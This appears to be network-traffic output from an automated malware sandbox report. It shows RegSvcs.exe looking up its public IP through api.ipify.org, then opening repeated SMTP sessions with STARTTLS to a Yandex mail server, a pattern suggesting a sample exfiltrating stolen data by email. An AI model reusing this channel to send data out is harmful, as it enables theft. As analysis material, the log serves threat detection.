                                                          Nov 21, 2024 09:05:09.637407064 CET5875000377.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:05:09.637411118 CET5875000377.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:05:09.637419939 CET5875000377.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:05:09.637423992 CET5875000377.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:05:09.637427092 CET5875000377.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:05:09.637444973 CET5875000377.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:05:09.637470961 CET5875000377.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:05:09.637476921 CET5875000377.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:05:09.637756109 CET5875000377.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:05:10.682054043 CET5875000377.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:05:10.735905886 CET50003587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:05:53.541387081 CET50003587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:05:53.660993099 CET5875000377.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:05:53.988724947 CET5875000377.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:05:53.988761902 CET5875000377.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:05:53.988811970 CET50003587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:05:53.989232063 CET50003587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:05:53.991404057 CET50005587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:05:54.108719110 CET5875000377.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:05:54.110996962 CET5875000577.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:05:54.111069918 CET50005587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:05:55.357485056 CET5875000577.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:05:55.357769966 CET50005587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:05:55.477365017 CET5875000577.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:05:55.793834925 CET5875000577.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:05:55.798875093 CET50005587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:05:55.918399096 CET5875000577.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:05:56.227880955 CET50005587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:05:56.234978914 CET5875000577.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:05:56.235028028 CET50005587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:05:56.295926094 CET50006587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:05:56.347902060 CET5875000577.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:05:56.347945929 CET50005587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:05:56.415916920 CET5875000677.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:05:56.415994883 CET50006587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:05:57.730782986 CET5875000677.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:05:57.731031895 CET50006587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:05:57.850684881 CET5875000677.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:05:58.190062046 CET5875000677.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:05:58.190253973 CET50006587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:05:58.310045004 CET5875000677.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:05:58.649436951 CET5875000677.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:05:58.653245926 CET50006587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:05:58.773143053 CET5875000677.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:05:59.114547014 CET5875000677.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:05:59.114557981 CET5875000677.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:05:59.114571095 CET5875000677.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:05:59.114578009 CET5875000677.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:05:59.114584923 CET5875000677.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:05:59.114655972 CET50006587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:05:59.114706993 CET50006587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:05:59.116801023 CET50006587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:05:59.236373901 CET5875000677.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:05:59.576184034 CET5875000677.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:05:59.578994989 CET50006587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:05:59.698760986 CET5875000677.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:06:00.038142920 CET5875000677.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:06:00.038404942 CET50006587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:06:00.157963991 CET5875000677.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:06:00.497504950 CET5875000677.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:06:00.497752905 CET50006587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:06:00.617480993 CET5875000677.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:06:00.969428062 CET5875000677.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:06:00.971097946 CET50006587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:06:01.091902971 CET5875000677.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:06:01.435367107 CET5875000677.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:06:01.435630083 CET50006587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:06:01.555197954 CET5875000677.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:06:01.989896059 CET5875000677.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:06:01.993124962 CET50006587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:06:02.116483927 CET5875000677.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:06:02.466011047 CET5875000677.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:06:02.466401100 CET50006587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:06:02.466464996 CET50006587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:06:02.466516018 CET50006587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:06:02.466566086 CET50006587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:06:02.467909098 CET50006587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:06:02.585999966 CET5875000677.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:06:02.586039066 CET5875000677.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:06:02.586047888 CET5875000677.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:06:02.586056948 CET50006587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:06:02.586071014 CET5875000677.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:06:02.586107016 CET50006587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:06:02.587404966 CET5875000677.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:06:02.587454081 CET5875000677.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:06:02.587476969 CET50006587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:06:02.587496042 CET50006587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:06:02.587511063 CET5875000677.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:06:02.587521076 CET5875000677.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:06:02.587543964 CET5875000677.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:06:02.587559938 CET50006587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:06:02.587580919 CET50006587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:06:02.587707996 CET5875000677.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:06:02.587717056 CET5875000677.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:06:02.587745905 CET50006587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:06:02.587757111 CET5875000677.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:06:02.587759972 CET50006587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:06:02.587774038 CET5875000677.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:06:02.587796926 CET50006587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:06:02.587810040 CET50006587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:06:02.705641031 CET5875000677.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:06:02.705709934 CET50006587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:06:02.705791950 CET5875000677.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:06:02.705842018 CET50006587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:06:02.706960917 CET5875000677.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:06:02.707007885 CET50006587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:06:02.707091093 CET5875000677.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:06:02.707171917 CET50006587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:06:02.707195044 CET5875000677.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:06:02.707240105 CET50006587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:06:02.707284927 CET5875000677.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:06:02.707321882 CET50006587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:06:02.707357883 CET5875000677.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:06:02.707402945 CET50006587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:06:02.707453966 CET5875000677.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:06:02.707504034 CET50006587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:06:02.707509041 CET5875000677.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:06:02.707550049 CET50006587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:06:02.707601070 CET5875000677.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:06:02.707631111 CET5875000677.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:06:02.707643032 CET50006587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:06:02.708506107 CET50006587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:06:02.708596945 CET50006587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:06:02.753597021 CET5875000677.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:06:02.825660944 CET5875000677.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:06:02.825737000 CET5875000677.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:06:02.826659918 CET5875000677.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:06:02.827089071 CET5875000677.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:06:02.827321053 CET5875000677.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:06:02.827440977 CET5875000677.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:06:02.827519894 CET5875000677.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:06:02.827635050 CET5875000677.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:06:02.827678919 CET5875000677.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:06:02.827816963 CET5875000677.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:06:02.828002930 CET5875000677.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:06:02.828166008 CET5875000677.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:06:02.828202009 CET5875000677.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:06:02.828321934 CET5875000677.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:06:02.828337908 CET5875000677.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:06:02.828491926 CET5875000677.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:06:02.828517914 CET5875000677.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:06:02.828613997 CET5875000677.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:06:02.828629017 CET5875000677.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:06:02.828757048 CET5875000677.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:06:02.828778982 CET5875000677.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:06:02.828933001 CET5875000677.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:06:02.828984022 CET5875000677.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:06:02.829005957 CET5875000677.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:06:02.829019070 CET5875000677.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:06:03.649336100 CET5875000677.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:06:03.845366001 CET50006587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:06:03.946868896 CET50006587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:06:04.066457033 CET5875000677.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:06:04.405930042 CET5875000677.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:06:04.406024933 CET5875000677.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:06:04.406068087 CET50006587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:06:04.406559944 CET50006587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:06:04.408736944 CET50007587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:06:04.526043892 CET5875000677.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:06:04.528261900 CET5875000777.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:06:04.528599024 CET50007587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:06:05.785904884 CET5875000777.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:06:05.788331985 CET50007587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:06:05.907847881 CET5875000777.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:06:06.236552000 CET5875000777.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:06:06.257749081 CET50007587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:06:06.377496004 CET5875000777.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:06:06.706059933 CET5875000777.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:06:06.751629114 CET50007587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:06:07.046787977 CET50007587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:06:07.166409969 CET5875000777.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:06:07.496869087 CET5875000777.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:06:07.496912956 CET5875000777.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:06:07.496927023 CET5875000777.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:06:07.496958017 CET50007587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:06:07.496977091 CET5875000777.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:06:07.497013092 CET50007587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:06:07.498667955 CET50007587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:06:07.618127108 CET5875000777.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:06:07.947432041 CET5875000777.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:06:07.951194048 CET50007587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:06:08.070676088 CET5875000777.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:06:08.399692059 CET5875000777.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:06:08.402910948 CET50007587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:06:08.522454023 CET5875000777.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:06:08.851121902 CET5875000777.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:06:08.855333090 CET50007587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:06:08.974843979 CET5875000777.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:06:09.318787098 CET5875000777.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:06:09.319035053 CET50007587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:06:09.438628912 CET5875000777.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:06:09.772881031 CET5875000777.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:06:09.845350027 CET50007587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:06:11.353365898 CET50007587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:06:11.354037046 CET50007587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:06:11.399524927 CET50008587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:06:11.474152088 CET5875000777.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:06:11.475075960 CET5875000777.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:06:11.475152969 CET50007587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:06:11.519144058 CET5875000877.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:06:11.519259930 CET50008587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:06:12.938718081 CET5875000877.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:06:12.985970020 CET50008587192.168.2.677.88.21.158

                                                          UDP Packets

                                                          TimestampSource PortDest PortSource IPDest IP
                                                          Nov 21, 2024 09:02:05.925415039 CET6251453192.168.2.61.1.1.1
                                                          Nov 21, 2024 09:02:06.151273012 CET53625141.1.1.1192.168.2.6
                                                          Nov 21, 2024 09:02:08.599760056 CET5647153192.168.2.61.1.1.1
                                                          Nov 21, 2024 09:02:08.825994015 CET53564711.1.1.1192.168.2.6

                                                          DNS Queries

                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                          Nov 21, 2024 09:02:05.925415039 CET192.168.2.61.1.1.10xb7aStandard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                          Nov 21, 2024 09:02:08.599760056 CET192.168.2.61.1.1.10x6583Standard query (0)smtp.yandex.comA (IP address)IN (0x0001)false

                                                          DNS Answers

                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                          Nov 21, 2024 09:02:06.151273012 CET1.1.1.1192.168.2.60xb7aNo error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
                                                          Nov 21, 2024 09:02:06.151273012 CET1.1.1.1192.168.2.60xb7aNo error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
                                                          Nov 21, 2024 09:02:06.151273012 CET1.1.1.1192.168.2.60xb7aNo error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
                                                          Nov 21, 2024 09:02:08.825994015 CET1.1.1.1192.168.2.60x6583No error (0)smtp.yandex.comsmtp.yandex.ruCNAME (Canonical name)IN (0x0001)false
                                                          Nov 21, 2024 09:02:08.825994015 CET1.1.1.1192.168.2.60x6583No error (0)smtp.yandex.ru77.88.21.158A (IP address)IN (0x0001)false

                                                          HTTP Request Dependency Graph

                                                          • api.ipify.org

                                                          HTTPS Proxied Packets

                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          0192.168.2.649711104.26.13.2054437088C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-11-21 08:02:07 UTC155OUTGET / HTTP/1.1
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                                          Host: api.ipify.org
                                                          Connection: Keep-Alive
                                                          2024-11-21 08:02:07 UTC399INHTTP/1.1 200 OK
                                                          Date: Thu, 21 Nov 2024 08:02:07 GMT
                                                          Content-Type: text/plain
                                                          Content-Length: 11
                                                          Connection: close
                                                          Vary: Origin
                                                          CF-Cache-Status: DYNAMIC
                                                          Server: cloudflare
                                                          CF-RAY: 8e5f27de28625e71-EWR
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1747&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2820&recv_bytes=769&delivery_rate=1671436&cwnd=238&unsent_bytes=0&cid=07316f2fad495ed1&ts=458&x=0"
                                                          2024-11-21 08:02:07 UTC11INData Raw: 38 2e 34 36 2e 31 32 33 2e 37 35
                                                          Data Ascii: 8.46.123.75


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          1192.168.2.649716104.26.13.2054437392C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-11-21 08:02:12 UTC155OUTGET / HTTP/1.1
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                                          Host: api.ipify.org
                                                          Connection: Keep-Alive
                                                          2024-11-21 08:02:12 UTC399INHTTP/1.1 200 OK
                                                          Date: Thu, 21 Nov 2024 08:02:12 GMT
                                                          Content-Type: text/plain
                                                          Content-Length: 11
                                                          Connection: close
                                                          Vary: Origin
                                                          CF-Cache-Status: DYNAMIC
                                                          Server: cloudflare
                                                          CF-RAY: 8e5f27fc1eea425f-EWR
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1572&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2821&recv_bytes=769&delivery_rate=1814791&cwnd=235&unsent_bytes=0&cid=9e089e2987291928&ts=794&x=0"
                                                          2024-11-21 08:02:12 UTC11INData Raw: 38 2e 34 36 2e 31 32 33 2e 37 35
                                                          Data Ascii: 8.46.123.75


                                                          SMTP Packets

                                                          TimestampSource PortDest PortSource IPDest IPCommands
                                                          Nov 21, 2024 09:02:10.243345022 CET5874971477.88.21.158192.168.2.6220 mail-nwsmtp-smtp-production-main-84.vla.yp-c.yandex.net Ok 1732176129-92ONt11OciE0
                                                          Nov 21, 2024 09:02:10.243590117 CET49714587192.168.2.677.88.21.158EHLO 367706
                                                          Nov 21, 2024 09:02:10.691677094 CET5874971477.88.21.158192.168.2.6250-mail-nwsmtp-smtp-production-main-84.vla.yp-c.yandex.net
                                                          250-8BITMIME
                                                          250-PIPELINING
                                                          250-SIZE 53477376
                                                          250-STARTTLS
                                                          250-AUTH LOGIN PLAIN XOAUTH2
                                                          250-DSN
                                                          250 ENHANCEDSTATUSCODES
                                                          Nov 21, 2024 09:02:14.765059948 CET5874972477.88.21.158192.168.2.6220 mail-nwsmtp-smtp-production-main-64.vla.yp-c.yandex.net Ok 1732176134-E2Otb81Oo4Y0
                                                          Nov 21, 2024 09:02:14.802515984 CET49724587192.168.2.677.88.21.158EHLO 367706
                                                          Nov 21, 2024 09:02:15.265408039 CET5874972477.88.21.158192.168.2.6250-mail-nwsmtp-smtp-production-main-64.vla.yp-c.yandex.net
                                                          250-8BITMIME
                                                          250-PIPELINING
                                                          250-SIZE 53477376
                                                          250-STARTTLS
                                                          250-AUTH LOGIN PLAIN XOAUTH2
                                                          250-DSN
                                                          250 ENHANCEDSTATUSCODES
                                                          Nov 21, 2024 09:02:15.265916109 CET49724587192.168.2.677.88.21.158STARTTLS
                                                          Nov 21, 2024 09:02:15.728729010 CET5874972477.88.21.158192.168.2.6220 Go ahead
                                                          Nov 21, 2024 09:02:22.464337111 CET5874974777.88.21.158192.168.2.6220 mail-nwsmtp-smtp-production-main-91.myt.yp-c.yandex.net Ok 1732176142-M2Ovap0OkKo0
                                                          Nov 21, 2024 09:02:22.464531898 CET49747587192.168.2.677.88.21.158EHLO 367706
                                                          Nov 21, 2024 09:02:22.924563885 CET5874974777.88.21.158192.168.2.6250-mail-nwsmtp-smtp-production-main-91.myt.yp-c.yandex.net
                                                          250-8BITMIME
                                                          250-PIPELINING
                                                          250-SIZE 53477376
                                                          250-STARTTLS
                                                          250-AUTH LOGIN PLAIN XOAUTH2
                                                          250-DSN
                                                          250 ENHANCEDSTATUSCODES
                                                          Nov 21, 2024 09:02:22.924829006 CET49747587192.168.2.677.88.21.158STARTTLS
                                                          Nov 21, 2024 09:02:23.384685040 CET5874974777.88.21.158192.168.2.6220 Go ahead
                                                          Nov 21, 2024 09:03:47.723155975 CET5874994077.88.21.158192.168.2.6220 mail-nwsmtp-smtp-production-main-47.klg.yp-c.yandex.net Ok 1732176227-l3O5Q51OnuQ0
                                                          Nov 21, 2024 09:03:47.723365068 CET49940587192.168.2.677.88.21.158EHLO 367706
                                                          Nov 21, 2024 09:03:48.170960903 CET5874994077.88.21.158192.168.2.6250-mail-nwsmtp-smtp-production-main-47.klg.yp-c.yandex.net
                                                          250-8BITMIME
                                                          250-PIPELINING
                                                          250-SIZE 53477376
                                                          250-STARTTLS
                                                          250-AUTH LOGIN PLAIN XOAUTH2
                                                          250-DSN
                                                          250 ENHANCEDSTATUSCODES
                                                          Nov 21, 2024 09:03:48.171999931 CET49940587192.168.2.677.88.21.158STARTTLS
                                                          Nov 21, 2024 09:03:48.619554043 CET5874994077.88.21.158192.168.2.6220 Go ahead
                                                          Nov 21, 2024 09:03:57.559294939 CET5874996577.88.21.158192.168.2.6220 mail-nwsmtp-smtp-production-main-22.iva.yp-c.yandex.net Ok 1732176237-v3O7xp0OoiE0
                                                          Nov 21, 2024 09:03:57.559839964 CET49965587192.168.2.677.88.21.158EHLO 367706
                                                          Nov 21, 2024 09:03:58.012135029 CET5874996577.88.21.158192.168.2.6250-mail-nwsmtp-smtp-production-main-22.iva.yp-c.yandex.net
                                                          250-8BITMIME
                                                          250-PIPELINING
                                                          250-SIZE 53477376
                                                          250-STARTTLS
                                                          250-AUTH LOGIN PLAIN XOAUTH2
                                                          250-DSN
                                                          250 ENHANCEDSTATUSCODES
                                                          Nov 21, 2024 09:03:58.012548923 CET49965587192.168.2.677.88.21.158STARTTLS
                                                          Nov 21, 2024 09:03:58.464906931 CET5874996577.88.21.158192.168.2.6220 Go ahead
                                                          Nov 21, 2024 09:04:36.719955921 CET5874999877.88.21.158192.168.2.6220 mail-nwsmtp-smtp-production-main-95.klg.yp-c.yandex.net Ok 1732176276-a4Oksw0OmSw0
                                                          Nov 21, 2024 09:04:36.720521927 CET49998587192.168.2.677.88.21.158EHLO 367706
                                                          Nov 21, 2024 09:04:37.168386936 CET5874999877.88.21.158192.168.2.6250-mail-nwsmtp-smtp-production-main-95.klg.yp-c.yandex.net
                                                          250-8BITMIME
                                                          250-PIPELINING
                                                          250-SIZE 53477376
                                                          250-STARTTLS
                                                          250-AUTH LOGIN PLAIN XOAUTH2
                                                          250-DSN
                                                          250 ENHANCEDSTATUSCODES
                                                          Nov 21, 2024 09:04:37.168534040 CET49998587192.168.2.677.88.21.158STARTTLS
                                                          Nov 21, 2024 09:04:37.617652893 CET5874999877.88.21.158192.168.2.6220 Go ahead
                                                          Nov 21, 2024 09:04:52.640229940 CET5875000177.88.21.158192.168.2.6220 mail-nwsmtp-smtp-production-canary-88.sas.yp-c.yandex.net Ok 1732176292-q4OvOK1OpGk0
                                                          Nov 21, 2024 09:04:52.640386105 CET50001587192.168.2.677.88.21.158EHLO 367706
                                                          Nov 21, 2024 09:04:53.106096983 CET5875000177.88.21.158192.168.2.6250-mail-nwsmtp-smtp-production-canary-88.sas.yp-c.yandex.net
                                                          250-8BITMIME
                                                          250-PIPELINING
                                                          250-SIZE 53477376
                                                          250-STARTTLS
                                                          250-AUTH LOGIN PLAIN XOAUTH2
                                                          250-DSN
                                                          250 ENHANCEDSTATUSCODES
                                                          Nov 21, 2024 09:04:53.106725931 CET50001587192.168.2.677.88.21.158STARTTLS
                                                          Nov 21, 2024 09:04:53.571733952 CET5875000177.88.21.158192.168.2.6220 Go ahead
                                                          Nov 21, 2024 09:05:04.471091032 CET5875000377.88.21.158192.168.2.6220 mail-nwsmtp-smtp-production-main-59.iva.yp-c.yandex.net Ok 1732176304-45OJsm0Oq8c0
                                                          Nov 21, 2024 09:05:04.471282959 CET50003587192.168.2.677.88.21.158EHLO 367706
                                                          Nov 21, 2024 09:05:04.917336941 CET5875000377.88.21.158192.168.2.6250-mail-nwsmtp-smtp-production-main-59.iva.yp-c.yandex.net
                                                          250-8BITMIME
                                                          250-PIPELINING
                                                          250-SIZE 53477376
                                                          250-STARTTLS
                                                          250-AUTH LOGIN PLAIN XOAUTH2
                                                          250-DSN
                                                          250 ENHANCEDSTATUSCODES
                                                          Nov 21, 2024 09:05:04.920950890 CET50003587192.168.2.677.88.21.158STARTTLS
                                                          Nov 21, 2024 09:05:05.369388103 CET5875000377.88.21.158192.168.2.6220 Go ahead
                                                          Nov 21, 2024 09:05:55.357485056 CET5875000577.88.21.158192.168.2.6220 mail-nwsmtp-smtp-production-main-57.myt.yp-c.yandex.net Ok 1732176355-t5OuYt0OjSw0
                                                          Nov 21, 2024 09:05:55.357769966 CET50005587192.168.2.677.88.21.158EHLO 367706
                                                          Nov 21, 2024 09:05:55.793834925 CET5875000577.88.21.158192.168.2.6250-mail-nwsmtp-smtp-production-main-57.myt.yp-c.yandex.net
                                                          250-8BITMIME
                                                          250-PIPELINING
                                                          250-SIZE 53477376
                                                          250-STARTTLS
                                                          250-AUTH LOGIN PLAIN XOAUTH2
                                                          250-DSN
                                                          250 ENHANCEDSTATUSCODES
                                                          Nov 21, 2024 09:05:55.798875093 CET50005587192.168.2.677.88.21.158STARTTLS
                                                          Nov 21, 2024 09:05:56.234978914 CET5875000577.88.21.158192.168.2.6220 Go ahead
